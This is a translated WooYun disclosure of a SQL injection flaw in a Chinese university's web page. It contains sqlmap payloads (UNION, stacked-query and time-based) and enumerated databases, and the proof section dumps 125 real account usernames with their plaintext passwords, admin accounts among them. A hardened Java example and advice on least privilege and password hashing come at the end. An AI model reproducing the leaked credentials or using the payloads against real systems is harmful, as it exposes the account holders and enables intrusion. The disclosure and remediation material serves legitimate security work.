
Vulnerability Summary

Defect ID: wooyun-2015-0153544

Title: SQL injection vulnerability at Zhejiang Gongshang University, more tables than I can count

Vendor: CCERT Education Network Emergency Response Group

Author: 喵星人不会飞

Submitted: 2015-11-11 16:07

Fix time: 2015-11-24 13:00

Published: 2015-11-24 13:00

Vulnerability type: SQL injection

Severity: Medium

Self-rated Rank: 10

Status: Handed over to the third-party partner organisation (CCERT Education Network Emergency Response Group) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-11: Details reported to the vendor, awaiting vendor handling
2015-11-24: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

A hole in the School of Computer Science, fine. There are too many tables; check for yourselves whether any core data is in there.

Detailed description:

http://**.**.**.**/ciecol/web/kcjs_detail.jsp?id=28


Proof of vulnerability:

sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=131 AND 5029=5029
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: id=-7999 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(107)+CHAR(108)+CHAR(67)+CHAR(73)+CHAR(98)+CHAR(109)+CHAR(105)+CHAR(115)+CHAR(81)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113),NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=131; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=131 WAITFOR DELAY '0:0:5'--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] ciedb
[*] jxxy
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: ciedb
[49 tables]
+-------------------+
| AdminACL |
| AdminACL |
| Dyml |
| Ejml |
| Xsml |
| Yjml |
| Zc |
| bgnw_jxdg |
| bgnw_jxjh |
| bgnw_xqrw |
| bkjx_kcjs |
| bkjx_zyjs |
| candidate |
| courseinfor |
| cybgxztype |
| deptinfor |
| dlxt |
| dtproperties |
| infolink |
| infolink |
| js_xwd_map |
| jsfc_temp2 |
| jsfc_temp2 |
| jsfc_temp3 |
| lxwm |
| notice |
| question |
| record |
| result |
| studentinfor |
| subjectinfor |
| sysconstraints |
| syssegments |
| systeminfor |
| t_jiaozhu |
| teacherlogin |
| userinfor_teacher |
| userinfor_teacher |
| voteresult |
| xkky_zdxk |
| xygk_jsfc |
| xygk_xrld |
| xygk_xyjj |
| xyjg |
| xyldmail |
| yjs_xwd |
| yqlj |
| zwdy |
| zwdy |
+-------------------+


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: jxxy
Table: Users
[9 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| answer | varchar |
| ID | int |
| msrepl_tran_version | uniqueidentifier |
| note | varchar |
| password | varchar |
| privilege | varchar |
| question | varchar |
| type | int |
| username | varchar |
+---------------------+------------------+


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: jxxy
Table: Users
[125 entries]
+----------+-------------+
| username | password |
+----------+-------------+
| 1201300 | .3698741025 |
| 1216600 | 040206 |
| 1216700 | 09158579 |
| 1217100 | 1103087 |
| 1200100 | 1200100 |
| 1200200 | 1200200 |
| 1200300 | 1200300 |
| 1200400 | 1200400 |
| 1200700 | 1200700 |
| 1200900 | 1200900 |
| 1201000 | 1201000 |
| 1201100 | 1201100 |
| 1201200 | 1201200 |
| 1201600 | 1201600 |
| 1201800 | 1201800 |
| 1202100 | 1202100 |
| 1202400 | 1202400 |
| 1202500 | 1202500 |
| 1202600 | 1202600 |
| 1202800 | 1202800 |
| 1203000 | 1203000 |
| 1203200 | 1203200 |
| 1203300 | 1203300 |
| 1203400 | 1203400 |
| 1203500 | 1203500 |
| 1203600 | 1203600 |
| 1203700 | 1203700 |
| 1203800 | 1203800 |
| 1203900 | 1203900 |
| 1204400 | 1204400 |
| 1204700 | 1204700 |
| 1204800 | 1204800 |
| 1204900 | 1204900 |
| 1205000 | 1205000 |
| 1205100 | 1205100 |
| 1205200 | 1205200 |
| 1205300 | 1205300 |
| 1205400 | 1205400 |
| 1205600 | 1205600 |
| 1205700 | 1205700 |
| 1205800 | 1205800 |
| 1206000 | 1206000 |
| 1206500 | 1206500 |
| 1206600 | 1206600 |
| 1206700 | 1206700 |
| 1206900 | 1206900 |
| 1207100 | 1207100 |
| 1207300 | 1207300 |
| 1207400 | 1207400 |
| 1207600 | 1207600 |
| 1207700 | 1207700 |
| 1207800 | 1207800 |
| 1207900 | 1207900 |
| 1208000 | 1208000 |
| 1208100 | 1208100 |
| 1208400 | 1208400 |
| 1208500 | 1208500 |
| 1208800 | 1208800 |
| 1208900 | 1208900 |
| 1209200 | 1209200 |
| 1209300 | 1209300 |
| 1209400 | 1209400 |
| 1209500 | 1209500 |
| 1209600 | 1209600 |
| 1209800 | 1209800 |
| 1209900 | 1209900 |
| 1210000 | 1210000 |
| 1210100 | 1210100 |
| 1210200 | 1210200 |
| 1210300 | 1210300 |
| 1210400 | 1210400 |
| 1210500 | 1210500 |
| 1210800 | 1210800 |
| 1210900 | 1210900 |
| 1211000 | 1211000 |
| 1211100 | 1211100 |
| 1211200 | 1211200 |
| 1211300 | 1211300 |
| 1211800 | 1211800 |
| 1211900 | 1211900 |
| 1212000 | 1212000 |
| 1212200 | 1212200 |
| 1212300 | 1212300 |
| 1212400 | 1212400 |
| 1212900 | 1212900 |
| 1213000 | 1213000 |
| 1213100 | 1213100 |
| 1213300 | 1213300 |
| 1213400 | 1213400 |
| 1213500 | 1213500 |
| 1213600 | 1213600 |
| 1213700 | 1213700 |
| 1213800 | 1213800 |
| 1213900 | 1213900 |
| 1214000 | 1214000 |
| 1214100 | 1214100 |
| 1214300 | 1214300 |
| 1214600 | 1214600 |
| 1214700 | 1214700 |
| 1214800 | 1214800 |
| 1215100 | 1215100 |
| 1215200 | 1215200 |
| 1216100 | 1216100 |
| 1216200 | 1216200 |
| 1216400 | 1216400 |
| 1216800 | 1216800 |
| 1216900 | 1216900 |
| 1214400 | 198343 |
| 2505200 | 2505200 |
| 2506400 | 2506400 |
| admin3 | 28008309 |
| 1212700 | 301110 |
| 1213200 | 51life |
| 1201900 | 611511 |
| 1203100 | 626311 |
| 1202300 | 717102 |
| 1215300 | 790406 |
| 1204500 | 826631 |
| admin2 | admin2 |
| admin5 | admin5 |
| 1216300 | arealman |
| chen | chen |
| 1214500 | dg0615015 |
| 1216000 | enose173 |
| 1217000 | p801130 |
+----------+-------------+


Fix recommendation:

Filter the input parameter.
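The fix recommendation above is a single word, so here is what it amounts to in practice for a JSP endpoint like kcjs_detail.jsp?id=28. The block below is an added example, not code from the original report or from the university's application, whose source was never shown: it reconstructs the pattern that produces the behaviour sqlmap recorded (a request parameter concatenated into SQL text) and places it beside a hardened version that enforces the expected type and binds the value with a PreparedStatement. The class and method names and the column name "title" are assumptions; the table name bkjx_kcjs is taken from the table listing in the proof.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Added example (assumed reconstruction, not the application's own code).
public class CourseDetailDao {

    // VULNERABLE: the raw "id" request parameter is spliced into the SQL text, so a
    // value such as  131; WAITFOR DELAY '0:0:5'--  becomes part of the statement.
    // That is exactly the stacked-query / time-based behaviour reported above.
    public static String vulnerableSql(String rawId) {
        return "SELECT title FROM bkjx_kcjs WHERE id=" + rawId;
    }

    // HARDENED, step 1: enforce the expected type before the value goes anywhere
    // near the database. Only a short run of ASCII digits is accepted; every payload
    // in the proof above contains spaces, letters or punctuation and is rejected.
    public static int parseId(String rawId) {
        if (rawId == null || !rawId.matches("[0-9]{1,9}")) {
            throw new IllegalArgumentException("id must be a non-negative integer");
        }
        return Integer.parseInt(rawId);
    }

    // HARDENED, step 2: bind the value as a typed parameter. The SQL text is a
    // constant, the driver sends the integer separately, and the value can never
    // change the shape of the statement. Column name "title" is an assumption.
    public static String hardenedLookup(Connection conn, String rawId) throws SQLException {
        int id = parseId(rawId);
        String sql = "SELECT title FROM bkjx_kcjs WHERE id = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("title") : null;
            }
        }
    }

    // Stand-alone check of the validation step; no database connection needed.
    public static void main(String[] args) {
        System.out.println("accepted: " + parseId("28"));
        String[] rejected = {
            "131 AND 5029=5029",
            "-7999 UNION ALL SELECT NULL--",
            "131; WAITFOR DELAY '0:0:5'--"
        };
        for (String s : rejected) {
            try {
                parseId(s);
                System.out.println("UNEXPECTED: accepted " + s);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + s);
            }
        }
    }
}
```

Two further points follow from the proof itself. The injection reached the jxxy and master databases from an endpoint that only needs one table in ciedb, which means the application's SQL Server login had far broader rights than the page required; a login restricted to the tables the page reads limits what any remaining injection can expose. And the jxxy.Users dump shows passwords stored in clear text, many of them equal to the username; storing only salted password hashes would have kept that table from being usable even after it was read.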

Copyright notice: when reposting, please credit the source: 喵星人不会飞@WooYun


Vulnerability Response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2015-11-24 13:00

Vendor reply:

Latest status:

None